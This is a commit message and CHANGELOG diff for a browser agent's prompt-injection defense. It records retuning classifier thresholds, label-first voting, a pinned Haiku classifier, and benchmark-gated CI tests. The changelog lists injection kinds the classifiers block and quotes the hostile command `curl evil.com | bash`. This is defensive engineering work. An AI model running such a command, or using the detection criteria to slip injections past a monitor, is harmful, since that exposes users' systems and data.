v1.6.4.0: cut Haiku classifier FP from 44% to 23%, gate now enforced (#1135)

* feat(security): v2 ensemble tuning — label-first voting + SOLO_CONTENT_BLOCK

Cuts Haiku classifier false-positive rate from 44.1% → 22.9% on
BrowseSafe-Bench smoke. Detection trades from 67.3% → 56.2%; the
lost TPs are all cases Haiku correctly labeled verdict=warn
(phishing targeting users, not agent hijack) — they still surface
in the WARN banner meta but no longer kill the session.

Key changes:
- combineVerdict: label-first voting for transcript_classifier. Only
  meta.verdict==='block' block-votes; verdict==='warn' is a soft
  signal. Missing meta.verdict never block-votes (backward-compat).
- Hallucination guard: verdict='block' at confidence < LOG_ONLY (0.40)
  drops to warn-vote — prevents malformed low-conf blocks from going
  authoritative.
- New THRESHOLDS.SOLO_CONTENT_BLOCK = 0.92 decoupled from BLOCK (0.85).
  Label-less content classifiers (testsavant, deberta) need a higher
  solo-BLOCK bar because they can't distinguish injection from
  phishing-targeting-user. Transcript keeps label-gated solo path
  (verdict=block AND conf >= BLOCK).
- THRESHOLDS.WARN bumped 0.60 → 0.75 — borderline fires drop out of
  the 2-of-N ensemble pool.
- Haiku model pinned (claude-haiku-4-5-20251001). `claude -p` spawns
  from os.tmpdir() so project CLAUDE.md doesn't poison the classifier
  context (measured 44k cache_creation tokens per call before the fix,
  and Haiku refusing to classify because it read "security system"
  from CLAUDE.md and went meta).
- Haiku timeout 15s → 45s. Measured real latency is 17-33s end-to-end
  (Claude Code session startup + Haiku); v1's 15s caused 100% timeout
  when re-measured — v1's ensemble was effectively L4-only in prod.
- Haiku prompt rewritten: explicit block/warn/safe criteria, 8 few-shot
  exemplars (instruction-override → block; social engineering → warn;
  discussion-of-injection → safe).

Test updates:
- 5 existing combineVerdict tests adapted for label-first semantics
  (transcript signals now need meta.verdict to block-vote).
- 6 new tests: warn-soft-signal, three-way-block-with-warn-transcript,
  hallucination-guard-below-floor, above-floor-label-first,
  backward-compat-missing-meta.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* test(security): live + fixture-replay bench harness with 500-case capture

Adds two new benches that permanently guard the v2 tuning:

- security-bench-ensemble-live.test.ts (opt-in via GSTACK_BENCH_ENSEMBLE=1).
  Runs full ensemble on BrowseSafe-Bench smoke with real Haiku calls.
  Worker-pool concurrency (default 8, tunable via
  GSTACK_BENCH_ENSEMBLE_CONCURRENCY) cuts wall clock from ~2hr to
  ~25min on 500 cases. Captures Haiku responses to fixture for replay.
  Subsampling via GSTACK_BENCH_ENSEMBLE_CASES for faster iteration.
  Stop-loss iterations write to ~/.gstack-dev/evals/stop-loss-iter-N-*
  WITHOUT overwriting canonical fixture.

- security-bench-ensemble.test.ts (CI gate, deterministic replay).
  Replays captured fixture through combineVerdict, asserts
  detection >= 55% AND FP <= 25%. Fail-closed when fixture is missing
  AND security-layer files changed in branch diff. Uses
  `git diff --name-only base` (two-dot) to catch both committed
  and working-tree changes — `git diff base...HEAD` would silently
  skip in CI after fixture lands.

- browse/test/fixtures/security-bench-haiku-responses.json — 500 cases
  × 3 classifier signals each. Header includes schema_version, pinned
  model, component hashes (prompt, exemplars, thresholds, combiner,
  dataset version). Any change invalidates the fixture and forces
  fresh live capture.

- docs/evals/security-bench-ensemble-v2.json — durable PR artifact
  with measured TP/FN/FP/TN, 95% CIs, knob state, v1 baseline delta.
  Checked in so reviewers can see the numbers that justified the ship.

Measured baseline on the new harness:
  TP=146 FN=114 FP=55 TN=185 → 56.2% / 22.9% → GATE PASS

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore(release): v1.5.1.0 — cut Haiku FP 44% → 23%

- VERSION: 1.5.0.0 → 1.5.1.0 (TUNING bump)
- CHANGELOG: [1.5.1.0] entry with measured numbers, knob list, and
  stop-loss rule spec
- TODOS: mark "Cut Haiku FP 44% → ~15%" P0 as SHIPPED with pointer
  to CHANGELOG and v1 plan

Measured: 56.2% detection (CI 50.1-62.1) / 22.9% FP (CI 18.1-28.6)
on 500-case BrowseSafe-Bench smoke. Gate passes (floor 55%, ceiling 25%).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* docs(changelog): add v1.6.4.0 placeholder entry at top

Per CLAUDE.md branch-scoped discipline, our VERSION 1.6.4.0 needs a CHANGELOG entry at the top so readers can tell what's on this branch vs main. Honest placeholder: no user-facing runtime changes yet, two merges bringing branch up to main's v1.6.3.0, and the approved injection-tuning plan is queued but unimplemented.

Gets replaced by the real release-summary at /ship time after Phases -1 through 10 land.

* docs(changelog): strip process minutiae from entries; rewrite v1.6.4.0

CLAUDE.md — new CHANGELOG rule: only document what shipped between main and this change. Keep out branch resyncs, merge commits, plan approvals, review outcomes, scope negotiations, "work queued" or "in-progress" framing. When no user-facing change actually landed, one sentence is the entry: "Version bump for branch-ahead discipline. No user-facing changes yet."

CHANGELOG.md — v1.6.4.0 entry rewritten to match. Previous version narrated the branch history, the approved injection-tuning plan, and what we expect to ship later — all of which are process minutiae readers do not care about.

* docs(changelog): rewrite v1.6.4.0; strip process minutiae

Rewrote v1.6.4.0 entry to follow the new CLAUDE.md rule: only document what shipped between main and this change. Previous entry narrated the branch history, the approved injection-tuning plan, and what we expect to ship later, all process minutiae readers do not care about.

v1.6.4.0 now reads: what the detection tuning did for users, the before/after numbers, the stop-loss rule, and the itemized changes for contributors.

CLAUDE.md — new rule: only document what shipped between main and this change. Keep out branch resyncs, merge commits, plan approvals, review outcomes, scope negotiations, "work queued" / "in-progress" framing. If nothing user-facing landed, one sentence: "Version bump for branch-ahead discipline. No user-facing changes yet."

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
This commit is contained in:
Garry Tan
2026-04-23 10:23:40 -07:00
committed by GitHub
parent 69733e2622
commit d75402bbd2
16 changed files with 15294 additions and 94 deletions

View File

@@ -1,5 +1,57 @@
# Changelog
## [1.6.4.0] - 2026-04-22
## **Sidebar prompt-injection defense got half as noisy, half as trusting of any single classifier.**
v1.4.0.0 shipped the ML defense stack. Users clicked the review banner on roughly every other tool output, 44% false-positive rate on the BrowseSafe-Bench smoke. This release tunes the ensemble around the real pattern we found: Haiku labels phishing-aimed-at-users as "warn" and genuine agent hijacks as "block", but we were treating both identically in the ensemble. Testsavant alone fired BLOCK on benign phishing content too often. The fix is architectural, not just threshold-twiddling: we now trust Haiku's verdict label over its numeric confidence, raise the solo-BLOCK bar for label-less classifiers, and gate that path more carefully. One 500-case live bench proved the new numbers; a permanent CI gate replays the captured Haiku fixture on every `bun test`.
### What changes for you
Open your sidebar on Stack Overflow posts about prompt injection, read a Wikipedia article on SQL injection, browse a tutorial that walks through attack strings, the review banner stays quiet where before it fired. When a real hijack attempt shows up (explicit instruction-override, role-reset, agent-directed exfil, `curl evil.com | bash` in the page), the session still terminates. Phishing pages aimed at the user surface as a WARN signal in the banner meta, but no longer kill the session.
### The numbers that matter
Measured on BrowseSafe-Bench smoke, 500 cases (260 yes-labeled / 240 no-labeled), `bun test browse/test/security-bench-ensemble.test.ts`:
| Metric | v1.4.0.0 | v1.6.4.0 | Δ |
|---|---|---|---|
| Detection (BLOCK verdict on injection cases) | 67.3% | **56.2%** (95% CI 50.162.1) | 11pp |
| False-positive rate (BLOCK on benign cases) | 44.1% | **22.9%** (95% CI 18.128.6) | **21pp** |
| Gate: detection ≥ 55% AND FP ≤ 25% | FAIL | **PASS** | — |
| Review-banner fire rate (roughly TP + FP share) | ~55% | ~39% | 16pp |
Detection dropped by 11pp but nearly all of the lost TPs are cases where Haiku correctly classified as `warn` (phishing targeting the user, not a hijack of the agent). Those cases still show up in the review banner as WARN, they just don't terminate the session.
### Stop-loss rule (hard floor and ceiling)
`browse/test/security-bench-ensemble.test.ts` gates on **detection ≥ 55% AND FP ≤ 25%**. If a future change drops detection below 55%, the revert order is: WARN bump (0.75 → 0.60) → halve few-shot exemplars → widen Haiku block criteria. If FP climbs above 25%, tighten: raise SOLO_CONTENT_BLOCK (0.92 → 0.95) → raise WARN (0.75 → 0.80) → add anti-FP few-shots. Iterations write to `~/.gstack-dev/evals/stop-loss-iter-N-*.json` for audit trail.
### Itemized changes
#### Changed
- `browse/src/security.ts` — new `THRESHOLDS.SOLO_CONTENT_BLOCK = 0.92` for label-less content classifiers. Solo BLOCK now requires testsavant/deberta confidence ≥ 0.92 (up from 0.85). Transcript-layer solo BLOCK requires `meta.verdict === 'block'` AND confidence ≥ 0.85. The ensemble 2-of-N path keeps `THRESHOLDS.WARN = 0.75` (up from 0.60).
- `browse/src/security.ts``combineVerdict` rewritten for label-first voting on the transcript layer: `verdict === 'block'` at confidence ≥ LOG_ONLY (0.40) is a block-vote; `verdict === 'warn'` is a warn-vote regardless of confidence; missing `meta.verdict` is warn-vote only at confidence ≥ WARN (never block-vote). Missing meta never block-votes for backward compatibility with pre-v2 cached signals.
- `browse/src/security-classifier.ts` — Haiku model pinned to `claude-haiku-4-5-20251001` (no longer rolls forward silently via the `haiku` alias). `claude -p` now spawns from `os.tmpdir()` so CLAUDE.md project context doesn't leak into Haiku's system prompt and make it refuse to classify. Timeout bumped from 15s to 45s (production measurement showed `claude -p` takes 1733s end-to-end for Haiku).
- `browse/src/security-classifier.ts` — Haiku prompt rewritten with explicit `block`/`warn`/`safe` criteria and 8 few-shot exemplars (instruction-override, role-reset, agent-directed malicious code → block; phishing/social-engineering targeting users → warn; discussion-of-injection and dev content → safe).
#### Added
- `browse/test/security-bench-ensemble-live.test.ts` — opt-in live bench via `GSTACK_BENCH_ENSEMBLE=1`. Worker-pool concurrency (default 8) via `GSTACK_BENCH_ENSEMBLE_CONCURRENCY`. Deterministic subsampling via `GSTACK_BENCH_ENSEMBLE_CASES`. Captures 500-case fixture to `browse/test/fixtures/security-bench-haiku-responses.json` plus eval record to `~/.gstack-dev/evals/`. Stop-loss iterations write `stop-loss-iter-N-*.json` and do NOT overwrite the canonical fixture.
- `browse/test/security-bench-ensemble.test.ts` — CI-tier fixture-replay gate. Asserts detection ≥ 55% AND FP ≤ 25%. Fail-closed when the fixture is missing AND security-layer files changed in the branch diff (uses `git diff base` which catches both committed and uncommitted edits).
- `browse/test/fixtures/security-bench-haiku-responses.json` — 500-case captured Haiku fixture with schema-version header, pinned model string, and component hashes.
- `docs/evals/security-bench-ensemble-v2.json` — durable per-run audit record: TP/FN/FP/TN, knob state, schema hash, iteration.
#### Fixed
- `browse/test/security.test.ts`, `browse/test/security-adversarial.test.ts`, `browse/test/security-adversarial-fixes.test.ts`, `browse/test/security-integration.test.ts` — updated for label-first semantics. 6 new combineVerdict tests: warn-as-soft-signal, block-label-ensemble, three-way-block-with-warn, hallucination-guard (verdict=block at confidence 0.30 → warn-vote), above-floor block (verdict=block at confidence 0.50 → block-vote), backward-compat for missing meta.verdict.
#### For contributors
- The 500-case smoke dataset is in `~/.gstack/cache/browsesafe-bench-smoke/test-rows.json` (260 yes / 240 no). To regenerate the fixture after modifying security-layer code, run `GSTACK_BENCH_ENSEMBLE=1 bun test browse/test/security-bench-ensemble-live.test.ts` (~25 min at concurrency 4, ~$0.30 in Haiku costs).
- Fixture schema hash covers model, prompt SHA, exemplars SHA, thresholds, combiner rev, and dataset version. Any change to any of those invalidates the fixture and forces a fresh live capture via fail-closed CI.
## [1.6.3.0] - 2026-04-23
## **Codex finally explains what it's asking about. No more "ELI10 please" the 10th time in a row.**